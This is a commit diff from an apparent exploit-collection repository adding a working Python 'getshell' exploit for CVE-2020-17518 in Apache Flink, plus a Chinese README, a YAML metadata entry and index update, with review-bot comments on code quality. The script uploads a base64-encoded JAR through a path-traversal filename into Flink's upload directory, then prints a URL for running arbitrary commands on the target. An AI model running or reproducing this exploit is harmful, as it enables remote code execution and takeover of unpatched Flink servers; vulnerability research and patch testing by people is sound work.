add CVE-2020-17518
parent
6788286c8d
commit
f03ad6df9b
|
@ -0,0 +1,30 @@
|
|||
import requests
|
||||
import base64
|
||||
import json
|
||||
import sys
|
||||
import cStringIO
|
||||
#jar_code="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"
|
||||
def main():
|
||||
if len(sys.argv) == 1 or sys.argv[1] == '-h':
|
||||
print('Usage :python2 flink-getshell.py http://example.com:8081')
|
||||
exit()
|
||||
url = sys.argv[1]
|
||||
jobmanager_config_dir = url + '/jobmanager/config'
|
||||
upload_jar_url = url + "/jars/upload"
|
||||
r1 = requests.get(jobmanager_config_dir,verify=False)
|
||||
#data = json.loads(req.text)[2]['value']
|
||||
data = json.loads(r1.text)
|
||||
for i in data:
|
||||
#print(i['key'])
|
||||
if i['key'] == "web.tmpdir":
|
||||
flink_webdir = i['value']
|
||||
print("webdir:%s" % flink_webdir)
|
||||
file_content = base64.b64decode('UEsDBBQAAAAIAASBJlLHe4y+9gIAAOgEAAANAAAARXhlY3V0ZS5jbGFzc21Uy1bUQBC9zTwSQnhFBEZ8gAoOCIwiKgKivEWGhwbRATaZ0AcCMwkmPQIbN/oTfIFrNoNHjn6Av+MatToqLycn6UpX3Vt1q7uT7z+/fAPQixUNTehQcVtFp4YudGsoR0rFHWnvKuhRcE9Fr4r7GlQ8UPFQQZ+KRxqq0C+HARWDMvRYwZCGJ3iqoQ7DKkakHZXDmIJxBRMM8UHHdcQQQyTZvsgQHfVWOUN12nH5bCGf5f6Clc1xCuQtx2WoTy6nN6x3VipnuWspU/iOuzYgiZWmsOzNGWsrxJNABZOklEEb37H5lnA8N1DwjOamV/BtPuHIrPr4DrcLgnfLnDou4woDGBQv6HatPKWZ0vEc0zrSmCGJ246rYxZzDI0nIuZ9z+ZBMFJwcqvcZ6g5r4/y2fnVbr5DBctStizTQr5U1nFTwTqJCAmOl/qjqTwMZK1gXSLndbzASyJ2EdHEAkNtCC8IJ5cybct1ua/glY5FvJb4NwRdGdaRwZKOZdmP8rfHM8rmshvcFgwXSiwneU98x6t3trHdQPA8Q8UaF9T/FvfFLkNbssTelMpfIby0t839USsgWXXJkiDV9lxBmx4wNJ1OPLpu+SZ/W+CuzQfalxguJksfiTjfcQIRyKMlYbFAWL4g+Em5k92jerXnncSsov6m3K2CoLTcooYbiPxvu04FiN6YLBUIheiFgI/xnJN3hDwgt0ou03+7Sjljds4LOFpwiT5IeZWByUNK41WatZBlZGMdB2D7kCf3Go0awciJKOL0vTYTrCyE/6B5nOxHoyzdEemZMSKfES0iZsSLUPbQfAg1E/+K8kzE0MxM1KgwM7FO8wD67Cf0GpX90UNUZYzqA9QUUbsHxagm1zEnEZUc45jTVcQFGa/LJKjIxQPUGw1FNPbHErEiEvuymVBtD3QayxEh3Qq9N6CSfkHV6EMNJlGLafpbcPJuohHvkcAHWozrxGhF5Ai9Cm7QfYR6kPlF4aiCm/Qa3q0Ea6MnClp0epJh0fbfUEsDBAoAAAgAACJ1bU8AAAAAAAAAAAAAAAAJAAAATUVUQS1JTkYvUEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALgAAAFBLAQI/ABQAAAAIAASBJlLHe4y+9gIAAOgEAAANACQAAAAAAAAAIAAAAAAAAABFeGVjdXRlLmNsYXNzCgAgAAAAAAABABgAsQeXEAPk1gFyshItA+TWAdyLEi0D5NYBUEsBAgoACgAACAAAInVtTwAAAAAAAAAAAAAAAAkAAAAAAAAAAAAAAAAAIQMAAE1FVEEtSU5GL1BLAQIUABQACAgIACJ1bU+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAEgDAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSwUGAAAAAAMAAwDcAAAAvgMAAAAA')
|
||||
files = {'jarfile': ('../../../../../..%s/flink-web-upload/new1.jar' % flink_webdir, cStringIO.StringIO(file_content), 'application/octet-stream')}
|
||||
r2 = requests.post(upload_jar_url, files=files, timeout=30, verify=False)
|
||||
print('the shell:%s/jars/new1.jar/run?entry-class=Execute&program-args="command"' % url)
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
|
||||
|
|
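Review bot: The `file_content` literal is a prebuilt JAR committed as an opaque base64 string, so a reviewer cannot tell what code a verification run places on the system under test; the only hint is the `Execute` entry class named in the final `print`. Commit the Java source next to the script and put a comment above the literal such as `# file_content: JAR built from <source path placeholder>, SHA-256 <digest placeholder>` so the blob can be reproduced and checked. `flink_webdir` is assigned only inside the `for i in data` loop, so a config response without a `web.tmpdir` key ends in a NameError instead of a clear message, and the first `requests.get` has no `timeout` although the later `post` does. The script leaves `new1.jar` in the upload directory and never removes it, which the README should state so the test instance can be cleaned up afterwards. `cStringIO` exists only on Python 2, which the usage string says but the README's `python flink-getshell.py` example does not.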
@ -0,0 +1,10 @@
|
|||
# Flink-文件上传
|
||||
Apache Flink 文件上传
|
||||
#Use
|
||||
Apache Flink是美国阿帕奇软件(Apache)基金会的一款开源的分布式流数据处理引擎。Apache Flink 1.5.1 引入了一个 REST 处理程序,它允许你通过恶意修改的 HTTP 标头将上传的文件写入本地文件系统上的任意位置。这些文件可以写入 Flink 1.5.1 可访问的任何位置。
|
||||
|
||||
# eg
|
||||
python flink-getshell.py http://example.com:8081
|
||||
|
||||
# reference
|
||||
code from: https://github.com/rakjong/Flink-CVE-2020-17518-getshell
|
|
@ -0,0 +1,19 @@
|
|||
id: CVE-2020-17518
|
||||
source: https://github.com/rakjong/Flink-CVE-2020-17518-getshell
|
||||
info:
|
||||
name: Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。
|
||||
severity: high
|
||||
description:
|
||||
在Apache Flink1.5.1中引入了 REST 处理程序,允许通过恶意修改HTTP HEADER将上传的文件写入本地文件系统上的任意位置。攻击者利用REST API,可以修改HTTP头,将上传的文件写入到本地文件系统上的任意位置。
|
||||
scope-of-influence:
|
||||
Apache Flink 1.5.1-1.11.2
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/cve-2020-17518
|
||||
- https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2020-17518
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2020-17518
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2020, Apache, Flink, Upload
|
|
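Review bot: The `name` field under `info` holds a sentence describing the product ("Apache Flink是一个开源流处理框架…") rather than the name of the vulnerability, so any index or report built from it will not say what the entry covers. The README added in the same commit already has a suitable title, e.g. `name: Apache Flink 文件上传`. `cnvd-id: None` and `kve-id: None` parse as the string "None" in YAML rather than as an empty value; if consumers test these fields for absence, `null` or omitting the key would be safer, which should be confirmed against the repository's other entries. The entry gives `scope-of-influence` but no remediation, so a short line pointing readers to the fixed release named in the NVD reference already listed would make it usable for defenders.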
@ -18,6 +18,8 @@ cve:
|
|||
- CVE-2020-1938
|
||||
apache-Spark:
|
||||
- CVE-2022-33891
|
||||
apache-Flink:
|
||||
- CVE-2020-17518
|
||||
apache-tomcat:
|
||||
- CVE-2020-13935
|
||||
Influx-DB:
|
||||
|
@ -114,4 +116,4 @@ kve:
|
|||
kylin-display-switch:
|
||||
- KVE-2022-0206
|
||||
kylin-activation:
|
||||
- KVE-2022-0231
|
||||
- KVE-2022-0231
|
||||
|
|